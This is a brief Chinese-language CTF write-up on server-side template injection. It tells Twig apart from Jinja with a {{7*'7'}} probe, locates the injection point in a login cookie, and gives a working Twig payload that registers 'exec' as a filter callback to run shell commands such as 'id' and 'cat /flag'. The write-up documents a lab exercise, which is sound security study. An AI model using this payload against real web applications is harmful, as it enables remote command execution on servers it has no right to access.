ssti主要为python的一些框架jinja2 mako tornado django。
模板注入测试顺序--是时候祭出这张图了：

首先到/flag.php这页进行测试：

Twig 
{{7*'7'}} 输出49
Jinja
{{7*'7'}}输出7777777

测试证明是Twig：

参考了这篇文章：
www.k0rz3n.com

因为提示cookie，经测试，登陆后cookie里的user是注入点：

payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

自己最后cat /flag就可以了。